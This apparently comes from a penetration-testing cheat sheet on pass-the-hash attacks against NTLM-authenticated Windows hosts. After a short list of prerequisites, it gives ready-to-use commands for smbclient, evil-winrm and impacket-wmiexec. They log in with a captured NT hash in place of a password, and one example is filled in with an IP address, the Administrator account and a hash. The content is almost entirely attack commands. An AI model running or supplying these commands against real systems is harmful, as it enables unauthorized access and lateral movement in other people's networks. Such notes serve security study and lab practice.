Pass the Hash

  • The server needs to use NTLM authentication

  • Another host must have remote logon available (RDP, SQL, SMB, etc.)

smb

smbclient \\\\<ip>\\dir -U user --pw-nt-hash <hash>

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

evil-winrm

evil-winrm -i <ip> -u user -H <hash>

impacket

impacket-wmiexec -hashes 00000000000000000000000000000000:<hash> user@<ip>
